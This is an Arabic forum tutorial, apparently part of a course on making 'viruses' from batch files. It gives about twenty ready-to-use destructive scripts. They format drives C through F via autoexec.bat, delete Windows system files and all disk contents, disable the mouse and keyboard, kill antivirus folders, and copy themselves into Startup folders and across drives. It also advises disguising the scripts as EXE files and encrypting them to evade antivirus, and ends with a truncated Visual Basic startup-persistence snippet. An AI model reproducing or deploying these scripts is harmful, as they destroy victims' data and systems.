echo d: >nul >>c:autoexec.bat
echo Del x.txt >nul >>c:autoexec.bat
التحليل
-------
كود PHP:
call attrib -h -r c:autoexec.bat >nul
ذكرنا انفاً الان لدخول الدريف والغاء ملف اسمة اكس(تكست مثلاً) فى الدوس كنت باتكتب
c:/ press enter فيتحول المحث |373| الى d:/ للاغاء هاتكتب
d:/Del x.txt press enter اذن معنا الكود الدوسى وقد قمنا بالعملية على كام خطوة على خطوتين اذن معنا الكود وعد الخطوات ومعنا الكود الاساسى للفيرس نستنتج التالى عدد سطر الكود لابد ان يكون
اثنين + واحد (اساسى) + اى عدد لو عاوز تكمل الفيرس لشىء تانى فيكون
كود PHP:
call attrib -h -r c:autoexec.bat >nul
(اساسى)
كود PHP:
echo d: >nul >>c:autoexec.bat
(الدخول على الدريف دى)
كود PHP:
echo Del x.txt >nul >>c:autoexec.bat
(الغاء ملف امسة اكس تكست)
تذكر :::::
كود PHP:
echo كود الدوس >nul >>c:autoexec.bat
------------------------------------
3 - اذ اردت الغاء كل الملفات التي امتدادها .txt في القرص
كود PHP:
call attrib -h -r c:autoexec.bat >nul
echo d: >nul >>c:autoexec.bat
echo Del *.txt >nul >>c:autoexec.bat
------------------------------------
4 - اذ اردت الغاء كل الملفات التي امتدادها .zipفي القرص
كود PHP:
call attrib -h -r c:autoexec.bat >nul
echo d: >nul >>c:autoexec.bat
echo Del *.zip >nul >>c:autoexec.bat
------------------------------------
5 - كود يقوم بالغاء ملفات النظام |300| و تحليله :
كود PHP:
@Echo off
c:
cd %WinDir%System
deltree /y *.dll
cd
deltree /y *.sys
تحليلة :
c: دخلنا على السى
كود PHP:
cd %WinDir%System
دخلنا على ملف السيستم فى الوندوز
كود PHP:
deltree /y *.dll
الغاء كل ملفات الامتداد DLL. والتى هي خاص بالوندوز
cd\ خرجنا بعد تنفيذ العملية الاولى
كود PHP:
deltree /y *.sys
و الغاء كل ملفات sys. فى الوندوز.
هذا الكود كامل ما عدى كود التاريخ و انت تعرف انه لا استطيع صنع فيروس يعتمد على التاريخ عن طريق الملفات الدفاعية يعمل هذا الكود على ايقاف المضادات و فورمات C,D,E,F فقط و اذ اردت يمكنك الاضافة , و كود اعادة التشغيل اعتقد انه انت قرأت الدرس الثاني و الاول ...
كود:
كود PHP:
@Echo Virus Format
@Echo www.3asfh.comvb
@Echo By RBG-7
call attrib -h -r c:autoexec.bat >nul
format c: /q /u /autotest >nul >>c:autoexec.bat
format d: /q /u /autotest >nul >>c:autoexec.bat
format e: /q /u /autotest >nul >>c:autoexec.bat
format f: /q /u /autotest >nul >>c:autoexec.bat
shutdown -s
End
اتمنى انه يكون واضح ..
إقتباس:
كود PHP:
call attrib -h -r c:autoexec.bat >nul
Call : للاتصال في ملف من نوع Bat
Attrib : هذا امر خاص بالدوس يعمل على تغير خصائص ملف
-h : اخفاء
-r : جعله فقط قراءة
c:\autoexec.bat : الملف المراد التنفيذ عليه
> nul : هذا الامر شروح في الدرس الاول و يعمل على عدم سؤال المستخدم
إقتباس:
كود PHP:
format a: /q /u /autotest >nul >>c:autoexec.bat
Format : امر الفورمات
a: الامر يطبق على القرص A
/q : سريع
/u : يقوم بحذف الملفات الاساسية
/autotest : هذا الامر مهم جدا يقوم بنقل الكود المكتوب الى الملف المطلوب>nul >> : نقل من دون سؤال
c:\autoexec.bat : الملف الذي سوف يطبق به الكود
إقتباس:
echo off@
shutdown -s -t 30 -c "message" طبعا نغير 30 الى عدد الثوان و message الى الرسالة
اغلاق الجهاز على الشبكة
@echo off : عدم استخدام الامر Echo
اخوي البعض يسأل لمذا وضع هذا الامر في بعض الاحيان يخطاء المبرمج و يكتب الامر و بعده الكود مما يأدي الى القراءة فقط دون تنفيذshutdown -s : اطفاء الحاسب
-t : الوقت
30 : ثانية
-c : اظهار رسالة
message : اكتب الرسالة التي تريد
إقتباس:
كود PHP:
@Echo off
c:
cd %WinDir%System
deltree /y *.dll
cd
deltree /y *.sys
نعم اخوي هذا كود كامل لفيروس تدمير النظام لا ينكتب في سطر واحد و السبب لانه كود كامل و ليس امر
الدرس الخامس
الدرس دا شرح عبارة عن اسئلة واجابة
1-اسئلة و حلول :
س1.كيف نستطيع عمل اعدة تشغيل عن الضغط على الفيروس
------------------------------------
عندما ضغط على الفيرس انتقلت اوامر الدوس الى ملف الاوتواكسك فلابد من اعادة التشغيل حتى يطلب الوندوز هذا الملف فيجدة وهو على الدوس فاينفذ الاور معتقداً انة يحمل
اوامر البدء ...
اضف هذا الكود لعمل ريستارت :
كود PHP:
c:windowsrundll***** user*****,exitwindow***ec
ألان عندما يضغط الضحية علية سوف يحدث وينتقل الاوامر الدوسية ومعها سطر الريستارت وهايحدث ريستارت
ويتم تنفيظ الاوامر الدوسيةفى سرعة كبيرة جدااىاننا اجبرنا الضحية على عمل ريستارت لكى يشتغل الفيرس
س2.هل هناك اكواد اخرى مثل عمل اغلاق للوندوز
------------------------------------
كود PHP:
c:windowsrundll32***** user*****,exitwindows
هذا كود الغلاق
س3.عندما اريد من الفيروس عدم حذف نفسه لماذا اكتب رموز (الدرس الثاني)
------------------------------------
لانه و قد ذكرة في الدرس السابق انه نظام التشغيل النوافذ (Windows)لا يقبل كتابة رموز في اسماء البرامج لاكن نظام التشغيل (MS-DOS)يوافق على كتابة هذه الاسماء .
س4.لماذا اقوم بتغير امتداد الفيروس من BAT الى EXE (الدرس الاول)
------------------------------------
لانه يمكن لاي شخص كشف الكود البرمجي للفيروس !! و هذا اكبر خطاً مما يؤدي الى استخادمه ضدك فيجب عليك الحذر ..
س5.لماذا اشفر الفيروس و لماذا لا تنص بكتابة كود تدمير المضدات (الدرس الثالث)
------------------------------------
لانه اذ قمت بكتابة الكود البرمجي الخاص بحذف او ايقاف عمل المضادات سوف يقوم المضاد بتنبيه الضحية و حذف الفيروس مباشرتاً مما يؤدي الى فشل العملية ...
س6.انت الان تعلمنا صناعة الفيروسات عن طريق الملفات الدفاعية اذن هل يوج مستى اقوى
------------------------------------
نعم,يوجد مستويات اقوى مثل الفيجول بيسك و السي بلص بلص و لغة التجميع لاكن من مميزات الملفات الدفاعية انه يمكن كتابة اي فيروس في اي حاسبة بدون برنامج معين او مترجم لغة فقط المفكرة ..
2-كودات فيروسات جاهزة :
1.فيروس عمل فورمات C,D,E,F والطابعه واعادة تشغيل الجهاز :
كود PHP:
call attrib -h -r c:autoexec.bat >nul
echo format c: /q /u /autotest >nul >>c:autoexec.bat
echo format d: /q /u /autotest >nul >>c:autoexec.bat
echo format e: /q /u /autotest >nul >>c:autoexec.bat
echo format f: /q /u /autotest >nul >>c:autoexec.bat
c:windowsrundll***** user*****,exitwindow***ec
------------------------------------
2.فيروس عمل فورمات C,D,E,F والطابعه :
كود PHP:
call attrib -h -r c:autoexec.bat >nul
echo format c: /q /u /autotest >nul >>c:autoexec.bat
echo format d: /q /u /autotest >nul >>c:autoexec.bat
echo format e: /q /u /autotest >nul >>c:autoexec.bat
echo format f: /q /u /autotest >nul >>c:autoexec.bat
------------------------------------
3.فيروس يحذف برنامج المفكرة وينسخ بدله برنامج اخر :
كود PHP:
del C:WINDOWSNOTEPAD*****
copy %0 C:WINDOWSNOTPAD*****
------------------------------------
4.فايروس افتراضي :
كود PHP:
@echo off
cls
:start
if exist c:AUTOEXEC.bat goto delc
if exist d:AUTOEXEC.bat goto deld
if exist e:AUTOEXEC.bat goto dele
if exist f:AUTOEXEC.bat goto delf
elc
del c:
goto end
eld
del d:
goto end
ele
del e:
goto end
elf
del f:
goto end
end
------------------------------------
5.فايروس النظام :
كود PHP:
@echo off
cls
:start
if exist c:windows goto next
if not exist c:windows goto copy
:next
del c:windows
goto end
:copy
cd c:
md virus
goto end
end
------------------------------------
6.فايروس الدوس :
كود PHP:
@echo off
C:WINDOWSrundll***** mouse,disable
C:WINDOWSrundll***** keyboard,disable
del c:command.com
del c:Io.sys
del c:Config.sys
del c:Msdos.sys
del c:windowssystem32command.com
deltree /y C:WINDOWSCOMMAND*.*
deltree /y C:WIN98COMMAND*.*
deltree /y C:WINmeCOMMAND*.*
deltree /y C:WIN_meCOMMAND*.*
deltree /y C:WINxpCOMMAND*.*
deltree /y C:WIN_xpCOMMAND*.*
del d:command.com
del d:Io.sys
del d:Config.sys
del d:Msdos.sys
del d:windowssystem32command.com
deltree ------------------------------------
7.فيروس قاتل ملفات السستم :
كود PHP:
@echo off
c:
cd C:WINDOWSSystem
deltree /y *.dll
cd
deltree /y *.sys
c:
cd C:WINDOWSSystem32
deltree /y *.dll
cd
deltree /y *.sys
d:
cd C:WINDOWSSystem
deltree /y *.dll
cd
deltree /y *.sys
d:
cd C:WINDOWSSystem32
deltree /y *.dll
cd
deltree /y *.sys
CLS
------------------------------------
8.فيروس قاتل الفأرة و لوحة المفاتيح :
كود PHP:
@echo off
C:WINDOWSrundll***** mouse,disable
C:WINDOWSrundll***** keyboard,disable
copy key.BAT C:WINDOWSstartm~1programsstartup
copy key.BAT C:Docume~1ALLUSE~1StartM~1ProgramsStartup
copy key.BAT D:Docume~1ALLUSE~1StartM~1ProgramsStartup
CLS
9.فيروس يمنع استخدام خصائص الشاشة :
كود PHP:
@echo off
cd
cd
deltree /y c:/windows/RUNDLL32*****
cd
cd
------------------------------------
10.فيروس تدمير سطح المكتب :
كود PHP:
@echo off
cd
cd
deltree /y c:/windows/desktop
cd
cd
------------------------------------
11.فيروس قاتل النورتن :
كود PHP:
@echo off
%WinDir%rundll***** mouse,disable
%WinDir%rundll***** keyboard,disable
copy hahahah.BAT %windir%startm~1programsstartup
copy hahahah.BAT C:Docume~1ALLUSE~1StartM~1ProgramsStartup
copy hahahah.BAT D:Docume~1ALLUSE~1StartM~1ProgramsStartup
deltree /y crogra~1norton~1*.*
deltree /y drogra~1norton~1*.*
deltree /y crogra~1zonela~1*.*
deltree /y drogra~1zonela~1*.*
cls
------------------------------------
12.فيروس التدمير :
كود PHP:
echo off@
c:windowsrundll***** mouse,disable
c:windowsrundll***** keyboard,diable
goto del
el
deltree y c:*.*
goto copy
:copy
copy %0 C:WINDOWSStart MenuProgramsStartUp**** of virus.bat
cls
puse
------------------------------------
13.فيروس يمحى جميع الملفات التى على الهارد :
كود PHP:
@echo off
c:
cd
deltree /y *.*
d:
cd
deltree /y *.*
------------------------------------
14.فيروس خاص :
كود PHP:
echo off@
del system.ini
del win.ini
del auto exec.bat
del config.sys
------------------------------------
15.اهم فايروس فايروس مدمر :
كود PHP:
echo off@
cls
call attrib -h -r c:autoexec.bat >nul
echo @echo off >c:autoexec.bat
echo deltree /y crogra~1*.* >nul >>c:autoexec.bat
echo copy c:windowscommandformat.com c: >nul >>c:autoexec.bat
echo copy c:windowscommanddeltree***** c: >nul >>c:autoexec.bat
echo deltree /y c:windows*.* >nul >>c:autoexec.bat
echo format c: /q /u /autotest >nul >>c:autoexec.bat
------------------------------------
16.فيروس عمل فورمات للجهاز فورا :
كود PHP:
echo off@
cls
call attrib -h -r c:autoexec.bat >nul
echo @echo off >c:autoexec.bat
echo deltree /y crogra~1*.* >nul >>c:autoexec.bat
echo copy c:windowscommandformat.com c: >nul >>c:autoexec.bat
echo copy c:windowscommanddeltree***** c: >nul >>c:autoexec.bat
echo deltree /y c:windows*.* >nul >>c:autoexec.bat
echo format c: /q /u /autotest >nul >>c:autoexec.bat
------------------------------------
17.فيروس قتل الوندوز وحذف كل الملفات بعد اول اعادة تشغيل للجهاز :
كود PHP:
call attrib -h -r c:autoexec.bat >nul
@Echo off
c:
cd %WinDir%System
deltree /y *.dll
cd
deltree /y *.sys
------------------------------------
18.فيروس قتل الوندوز وحذف كل الملفات بعد التشغيل مباشره
كود PHP:
@Echo off
c:
cd %WinDir%System
deltree /y *.dll
cd
deltree /y *.sys
------------------------------------
19.فيروس عمل فورمات C,D,E,F والطابعه وقفل الجهاز :
كود PHP:
call attrib -h -r c:autoexec.bat >nul
echo format c: /q /u /autotest >nul >>c:autoexec.bat
echo format d: /q /u /autotest >nul >>c:autoexec.bat
echo format e: /q /u /autotest >nul >>c:autoexec.bat
echo format f: /q /u /autotest >nul >>c:autoexec.bat
c:windowsrundll32***** user*****,exitwindows
------------------------------------
20.فيروس النسخ الالي :
كود PHP:
@echo off
:start
cls
copy %0 c:/virusautocopy.bat
copy %0 c:/windows/virusautocopy.bat
copy %0 d:/virusautocopy.bat
copy %0 c:/My ********s/virusautocopy.bat
end
------------------------------------
21.فايروس ينسخ نفسة في network و ملفات winzip و start up ( اهم فيروس – ) :
كود PHP:
send msg to any one onlin in the network and start many programs
del all c files and copy it self in any dirve
if exist d:
copy %0 d:game.bat
copy %0 d:autoexec.bat
@echo off
echo Virus ****:A7meedye
c:windowsrundll***** mouse,disable
c:windowsrundll***** keyboard,disable
goto network
:network
cls
if exist c:winnt goto winnt
copy %0 c:windowsalluse~1applic~1Network89.bat
copy %0 c:windowsalluse~1destkopNetwork89.bat
copy %0 c:windowsalluse~1startm~1Network89.bat
copy %0 c:windowsalluse~1startm~1progra~1Network89.ba t
goto zip
zip:
cls
@dir /s /b /l c:winzip32***** | set wz=
@FOR /F "delims==" %%y IN ('dir /s /b /l c:\*.zip') DO @echo "%wz%" -min -a -r -p "%%y"
goto startup
startup:
cls
copy %0 C:WINDOWSStart MenuProgramsStartUpNetwork89.bat
goto del
del:
deltree /y C:WINDOWS*.*
deltree /y C:Program Files*.*
deltree /y C:My ********s*.*
goto msg
msg:
NET SEND 127.0.0.1 you got a virus
goto start
:start
start MSPaint
start MSPaint
start MSPaint
start MSPaint
start MSPaint
start MSPaint
start MSPaint
start MSPaint
start MSPaint
start MSPaint
start MSPaint
start MSPaint
start MSPaint
start Notepad
start Notepad
start Notepad
start Notepad
start Notepad
start Notepad
start Notepad
start Notepad
start Notepad
start Notepad
start Notepad
start Notepad
start Notepad
goto end
:end
cls
echo Im fuck your computer
echo sorry about what my virus do but you are stuped
echo The Virus Made By A7meedye
puse
(هاذ الشرح يتبع للدرس الخامس)))))))))))))))))))
الدرس السادس
الدرس ذا مهم جدا
اخواني الاعزاء هذا الدرس يعتبر خاص في الدورة لانه عندما طرحة الدورة لقد نسيت بعض الاشياء المهمة و يجب علي اكمالها و ان شاء الله في هذا الدرس سوف ابري ذمتي من اجل اكمال الدورة .
1.طريقة تشغيل الفيروس عند بدا التشغيل :
سوف نستخدم لغة الفيجول بيسك و يجب على الشخص الذي يريد استخدام الكود لديه مستوى و لو فوق الوسط ليعرف وضع الكودات على كلاً يوجد كتاب و دورة الاستاذ الصقر الجراح يمكن من خلاالها تعلم الفيجول بيسك و انا انصح به المهم الان سوف اعطيكم الكودات و مناطق وضعها اما عن كيفية دمج الفيروس مع الفيجول فراجعوا الدرس الاول لمعرفة الطريقة الكاملة .
كود PHP:
كود بدا التشغيل :
في الموديل :
Option Explicit
Private Declare Function RegOpenKeyEx Lib "advapi32.dll" Alias "RegOpenKeyExA" (ByVal hKey As Long, ByVal lpSubKey As String, ByVal ulOptions As Long, ByVal samDesired As Long, phkResult As Long) As Long
Private Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long
Private Declare Function RegDeleteKey Lib "advapi32.dll" Alias "RegDeleteKeyA" (ByVal hKey As Long, ByVal lpSubKey As String) As Long
Private Declare Function RegDeleteValue Lib "advapi32.dll" Alias "RegDeleteValueA" (ByVal hKey As Long, ByVal lpValue**** As String) As Long
Private Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValue**** As String, ByVal Reserved As Long, ByVal dwType As Long, ByVal lpData As String, ByVal cbData As Long) As Long
Private Declare Function RegCreate
» الحب تلك الكلمة المكونة من حرفين
» قواعد البيانات و ربط جدول بيانات بمشروع دلفي
» ملف كل دول إكسال التي تحتاجها لكافة الحسابات الخاصة بالأجور بالوظيف العمومي
» السنة أولى رياضيات و إعلام آلي النظام الجديد LMD يشمل دروس، تمارين وحلول
» أرجو المساعدة
» طلب مساعدة
» حمل هذه الملفات فأنت بحاجة اليها
» دور الاتصالات الإدارية في تعزيز أداء العاملين في المستشفيات الحكومية والخاصة الإردنية في مدينة إربد
» مكتبة مذكرات التخرج لطلاب الإقتصاد حمل بلمسة زر وبروابط مباشرة
» تقدير نموذج للتنبؤ بالمبيعات باستخدام السلاسل الزمنية - رسالة ﻤـﺎﺠـﺴﺘـﻴـﺭ
» (¯`·._) ( 13 كتاب لمــادة الجبر باللغتين العربية و الفرنسية + تمارين محلولة
» قسم العلوم الاقتصادية التجارية و التسيير
» مجموعة كبيرة من مذكرات التخرج لتحميلها مجانا
» تثبيت الباك تراك 4